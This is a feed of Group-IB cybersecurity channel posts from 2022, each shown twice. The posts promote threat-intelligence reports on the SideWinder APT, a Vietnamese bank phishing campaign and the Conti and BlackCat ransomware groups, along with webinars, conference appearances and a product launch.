#DigitalRiskSummit2022 #digitalriskprotection #cybersecurity
During the Digital Risk Summit 2022 Antony Dolgalev, Deputy Head of Digital Risk Protection, presented the findings of Group-IB's research into various scam schemes.
Here are some highlights:
▪️Accounting for 57% of all financially motivated cybercrime, the scam industry is becoming more structured and involves more and more parties divided into hierarchical groups;
▪️Social media are more often becoming the first point of contact between scammers and their potential victims;
▪️The number of brand-impersonating scam resources created per month also increased. In the Middle East, Asia Pacific, and Europe, Group-IB analysts noted an increase of 150%, 83%, and 89% respectively.
More details 👈
During the Digital Risk Summit 2022 Antony Dolgalev, Deputy Head of Digital Risk Protection, presented the findings of Group-IB's research into various scam schemes.
Here are some highlights:
▪️Accounting for 57% of all financially motivated cybercrime, the scam industry is becoming more structured and involves more and more parties divided into hierarchical groups;
▪️Social media are more often becoming the first point of contact between scammers and their potential victims;
▪️The number of brand-impersonating scam resources created per month also increased. In the Middle East, Asia Pacific, and Europe, Group-IB analysts noted an increase of 150%, 83%, and 89% respectively.
More details 👈
#Webinar #Ransomware #DFIR
Ransomware-as-a-Service never ceases to impress and this year it is expanding not only quantitatively. To stand a chance against threat actors in 2022, it is vital to understand not only their latest tactics, techniques, and procedures but also what actions to take to protect against them. Join Group-IB's webinar on June 9, where Oleg Skulkin, Head of Digital Forensics and Incident Response, will give the insights into today’s ransomware threat landscape, and share detection strategies and threat hunting tips.
Register now👈
Ransomware-as-a-Service never ceases to impress and this year it is expanding not only quantitatively. To stand a chance against threat actors in 2022, it is vital to understand not only their latest tactics, techniques, and procedures but also what actions to take to protect against them. Join Group-IB's webinar on June 9, where Oleg Skulkin, Head of Digital Forensics and Incident Response, will give the insights into today’s ransomware threat landscape, and share detection strategies and threat hunting tips.
Register now👈
👍2
#APT #ThreatIntelligence #SideWinder
Group-IB Threat Intelligence researchers have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17). This threat actor is believed to be originating from India and primarily targeting Pakistan. The newly discovered custom tool, codenamed SideWinder.AntiBot.Script, is being used in the gang’s phishing attack against Pakistani targets.
▪️Over the last year, Group-IB Threat Intelligence system identified 92 IP addresses that have been used by SideWinder APT for phishing emails;
▪️Pakistan remains the primary target for SideWinder. The attackers are especially interested in the Pakistani government organizations based on the discovered phishing document and public studies;
▪️Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan are primary attack vectors of the gang;
▪️SideWinder started using an anti-bot script to filter their victims - they are only interested in Pakistani users;
▪️The group continues to distribute malicious files in ZIP archives with an LNK file inside, which downloads an HTA file from a remote server;
▪️Upon discovery, Group-IB Threat Intelligence team notified relevant local authorities and shared its findings to make sure that the threat can be identified and contained at early stages.
Want to know more? Check out our new blog post👈
Group-IB Threat Intelligence researchers have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17). This threat actor is believed to be originating from India and primarily targeting Pakistan. The newly discovered custom tool, codenamed SideWinder.AntiBot.Script, is being used in the gang’s phishing attack against Pakistani targets.
▪️Over the last year, Group-IB Threat Intelligence system identified 92 IP addresses that have been used by SideWinder APT for phishing emails;
▪️Pakistan remains the primary target for SideWinder. The attackers are especially interested in the Pakistani government organizations based on the discovered phishing document and public studies;
▪️Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan are primary attack vectors of the gang;
▪️SideWinder started using an anti-bot script to filter their victims - they are only interested in Pakistani users;
▪️The group continues to distribute malicious files in ZIP archives with an LNK file inside, which downloads an HTA file from a remote server;
▪️Upon discovery, Group-IB Threat Intelligence team notified relevant local authorities and shared its findings to make sure that the threat can be identified and contained at early stages.
Want to know more? Check out our new blog post👈
🔥1
#phishing #CERT
Group-IB has discovered an unprecedented phishing attack in Vietnam. The campaign impersonates 27 popular Vietnam’s financial institutions and is still active at the time of writing.
The cybercriminals seek to reap highly detailed personal information from the clients of those institutions to the extent of robbing their bank accounts. The fraudsters use techniques that allow them to bypass OTP verification.
Thanks to Group-IB’s Graph Network Analysis tool, CERT-GIB was able to identify 240 interconnected domains that are a part of the phishing campaign’s infrastructure. Upon detection of this activity, CERT-GIB immediately notified Vietnam’s national computer emergency response team VNCERT. All 240 domains have been blocked following CERT-GIB and local authorities’ efforts. Yet, new domains regularly appear.
Check out our new blog post to learn more👈
Group-IB has discovered an unprecedented phishing attack in Vietnam. The campaign impersonates 27 popular Vietnam’s financial institutions and is still active at the time of writing.
The cybercriminals seek to reap highly detailed personal information from the clients of those institutions to the extent of robbing their bank accounts. The fraudsters use techniques that allow them to bypass OTP verification.
Thanks to Group-IB’s Graph Network Analysis tool, CERT-GIB was able to identify 240 interconnected domains that are a part of the phishing campaign’s infrastructure. Upon detection of this activity, CERT-GIB immediately notified Vietnam’s national computer emergency response team VNCERT. All 240 domains have been blocked following CERT-GIB and local authorities’ efforts. Yet, new domains regularly appear.
Check out our new blog post to learn more👈
🔥8
#cybersecurity #ACDF
🤝The Africa Cyber Defense Forum (ACDF), a continental platform for public-private cooperation, announced Group-IB, one of the global cybersecurity leaders with headquarters in Singapore, & afriVAD among the sponsors of the forum edition 2022.
"We are proud to be involved in the 2022 edition of the Africa Cyber Defense Forum," says Ashraf Koheil, Group-IB’s Director of Business Development in the Middle East Africa, and Turkey. "Such events foster innovation and unlock opportunities for public-private cooperation in the cyber domain. Africa has been an important focus for Group-IB from the research and business perspectives. The expanding coverage of our global threat hunting ecosystem now allows us to pursue our mission of disrupting cybercrime in the region."
More details👈
🤝The Africa Cyber Defense Forum (ACDF), a continental platform for public-private cooperation, announced Group-IB, one of the global cybersecurity leaders with headquarters in Singapore, & afriVAD among the sponsors of the forum edition 2022.
"We are proud to be involved in the 2022 edition of the Africa Cyber Defense Forum," says Ashraf Koheil, Group-IB’s Director of Business Development in the Middle East Africa, and Turkey. "Such events foster innovation and unlock opportunities for public-private cooperation in the cyber domain. Africa has been an important focus for Group-IB from the research and business perspectives. The expanding coverage of our global threat hunting ecosystem now allows us to pursue our mission of disrupting cybercrime in the region."
More details👈
🔥5
#interview
On the sidelines of the The Future of Data Centers Summit, Ashraf Koheil, Regional Director, Middle East, North Africa and Turkey at Group-IB, gave an interview to Ahram Online, a news portal. He shared his opinion on digital transformation in Egypt and discussed the main threats to the Egyptian banking sector in terms of cybersecurity. Read the interview👈
On the sidelines of the The Future of Data Centers Summit, Ashraf Koheil, Regional Director, Middle East, North Africa and Turkey at Group-IB, gave an interview to Ahram Online, a news portal. He shared his opinion on digital transformation in Egypt and discussed the main threats to the Egyptian banking sector in terms of cybersecurity. Read the interview👈
Ahram Online
INTERVIEW: ‘Egypt made significant strides towards digital transformation’ - Group-IB - Economy - Business
Egypt held the Future of Data Centres Summit in May under the auspices of the Ministry of Communication and Information Technology – the biggest specialised technology summit in the Middle East and Africa (MEA) region.
👍4
#cybersecurity #VSS2022 #Vietnam
Save the date: Group-IB will take part in Vietnam Security Summit on Thursday, June 23 at JW Marriott Hotel Hanoi.
Catch Anh Le Duc’s speaking session on the topic of managing Attack Surfaces of Internet-facing assets & systems.
Do visit our booth as well and speak to our friendly representatives.
Hope to see you there!
More details: https://bit.ly/3y5xHYl
Save the date: Group-IB will take part in Vietnam Security Summit on Thursday, June 23 at JW Marriott Hotel Hanoi.
Catch Anh Le Duc’s speaking session on the topic of managing Attack Surfaces of Internet-facing assets & systems.
Do visit our booth as well and speak to our friendly representatives.
Hope to see you there!
More details: https://bit.ly/3y5xHYl
#cybersecurity #Seoul
Join Group-IB this Thursday, June 23 at the Next-Generation Security Vision 2022 Seminar & Exhibition!
Don’t forget to catch Hyun Suk Seo, our Business Development Manager in South Korea, as he speaks about Cyber Threat Intelligence and its integration with Attack Surface Management at 1:40 pm. Make sure to drop by our booth and get a chance to win exclusive merch when you leave your name card with us.
See you soon!
Join Group-IB this Thursday, June 23 at the Next-Generation Security Vision 2022 Seminar & Exhibition!
Don’t forget to catch Hyun Suk Seo, our Business Development Manager in South Korea, as he speaks about Cyber Threat Intelligence and its integration with Attack Surface Management at 1:40 pm. Make sure to drop by our booth and get a chance to win exclusive merch when you leave your name card with us.
See you soon!
#ransomware #research #Conti
Group-IB presents its new report on one of the most dangerous ransomware gangs called Conti. You may have heard about them from the news: a state of emergency was declared in Costa Rica due to a ransomware attack. On April 18, cybercriminals attacked the servers of several ministries. The hackers exfiltrated more than a terabyte of databases, correspondence, and internal documents. When the government refused to pay a ransom of $10 million, the ransomware operators doubled it to $20 million. In their message, the hackers said that the attack on Costa Rica was just a test and hinted that far worse attacks were yet to come.
Conti is considered one of the most successful ransomware groups. Group-IB's latest report "CONTI ARMADA: THE ARMATTACK CAMPAIGN" shares data and detailed information about the techniques, tactics, and tools that Conti uses currently. Click here to download it👈
Group-IB presents its new report on one of the most dangerous ransomware gangs called Conti. You may have heard about them from the news: a state of emergency was declared in Costa Rica due to a ransomware attack. On April 18, cybercriminals attacked the servers of several ministries. The hackers exfiltrated more than a terabyte of databases, correspondence, and internal documents. When the government refused to pay a ransom of $10 million, the ransomware operators doubled it to $20 million. In their message, the hackers said that the attack on Costa Rica was just a test and hinted that far worse attacks were yet to come.
Conti is considered one of the most successful ransomware groups. Group-IB's latest report "CONTI ARMADA: THE ARMATTACK CAMPAIGN" shares data and detailed information about the techniques, tactics, and tools that Conti uses currently. Click here to download it👈
👍3🔥1
#ransomware #research #Conti
Here are some highlights from Group-IB's new report "CONTI ARMADA: THE ARMATTACK CAMPAIGN":
▪️The total number of the group’s victims between 2020 (when Conti started its activity) and March 2021 is 813.
▪️The geography of attacks carried out by Conti is vast and does not include Russia. Most attacks fall on the United States, Canada, the United Kingdom, Germany, France, and Italy.
▪️According to the Group-IB Threat Intelligence team, the group’s fastest attack was carried out in exactly three days, from the moment when Conti penetrated the system to encryption.
▪️Group-IB for the first time analyzed Conti’s “working hours”. On average, Conti “works” 14 hours a day without holidays (except for “New Year holidays”) and weekends. The group starts working closer to noon (GMT+3) and its activity declines only after 9:00 PM.
▪️Just like a legitimate IT business, Conti has its own HR, R&D, OSINT, and even customer support departments.
Click here to download the report 👈
Here are some highlights from Group-IB's new report "CONTI ARMADA: THE ARMATTACK CAMPAIGN":
▪️The total number of the group’s victims between 2020 (when Conti started its activity) and March 2021 is 813.
▪️The geography of attacks carried out by Conti is vast and does not include Russia. Most attacks fall on the United States, Canada, the United Kingdom, Germany, France, and Italy.
▪️According to the Group-IB Threat Intelligence team, the group’s fastest attack was carried out in exactly three days, from the moment when Conti penetrated the system to encryption.
▪️Group-IB for the first time analyzed Conti’s “working hours”. On average, Conti “works” 14 hours a day without holidays (except for “New Year holidays”) and weekends. The group starts working closer to noon (GMT+3) and its activity declines only after 9:00 PM.
▪️Just like a legitimate IT business, Conti has its own HR, R&D, OSINT, and even customer support departments.
Click here to download the report 👈
👍5
#ransomware #BlackCat #ALPHV
Despite numerous arrests of people involved in ransomware activity as well as the shutdown of some affiliate programs, ransomware remains threat No. 1.
There is no doubt in the security community that the former members of DarkSide, BlackMatter, and REvil have formed the core of ALPHV, a more mature (due to their experience) and sophisticated affiliate program. Security researchers unofficially call it BlackCat for its use of two logos: a black cat and a knife dripping with blood. ALPHV members later attempted to move away from romanticizing crime by changing the design of their logo, but the name BlackCat has stuck.
Despite its short history, the group has conducted about 140 attacks worldwide over the course of six months and has set a new direction for the development of extortion-related crime. Many affiliate programs, such as Hive, started mimicking and adopting the methods and approaches of BlackCat.
More details 👈
Despite numerous arrests of people involved in ransomware activity as well as the shutdown of some affiliate programs, ransomware remains threat No. 1.
There is no doubt in the security community that the former members of DarkSide, BlackMatter, and REvil have formed the core of ALPHV, a more mature (due to their experience) and sophisticated affiliate program. Security researchers unofficially call it BlackCat for its use of two logos: a black cat and a knife dripping with blood. ALPHV members later attempted to move away from romanticizing crime by changing the design of their logo, but the name BlackCat has stuck.
Despite its short history, the group has conducted about 140 attacks worldwide over the course of six months and has set a new direction for the development of extortion-related crime. Many affiliate programs, such as Hive, started mimicking and adopting the methods and approaches of BlackCat.
More details 👈
🔥3
#UnifiedRiskPlatform
It’s no secret that the cyber threat landscape has intensified. The pace of cybercrime is accelerating, making it harder and harder for businesses to manage their cyber risks. Security teams are faced with the increasing challenge of identifying the specific threats they face, how to defend against them, and how to respond immediately in case of an incident.
To address these new challenges, Group-IB has developed the Unified Risk Platform, a comprehensive set of solutions that understands each organization’s threat profile and optimizes defenses against them in real time.
At the heart of the Unified Risk Platform is Group-IB’s Single Data Lake, which contains the industry’s largest and richest body of adversary intelligence. Every product and service in Group-IB’s consolidated security suite is enriched with intelligence from the data lake, enabling them to overcome the attacks targeting an organization and reduce organizational risk.
More details👈
It’s no secret that the cyber threat landscape has intensified. The pace of cybercrime is accelerating, making it harder and harder for businesses to manage their cyber risks. Security teams are faced with the increasing challenge of identifying the specific threats they face, how to defend against them, and how to respond immediately in case of an incident.
To address these new challenges, Group-IB has developed the Unified Risk Platform, a comprehensive set of solutions that understands each organization’s threat profile and optimizes defenses against them in real time.
At the heart of the Unified Risk Platform is Group-IB’s Single Data Lake, which contains the industry’s largest and richest body of adversary intelligence. Every product and service in Group-IB’s consolidated security suite is enriched with intelligence from the data lake, enabling them to overcome the attacks targeting an organization and reduce organizational risk.
More details👈
🔥3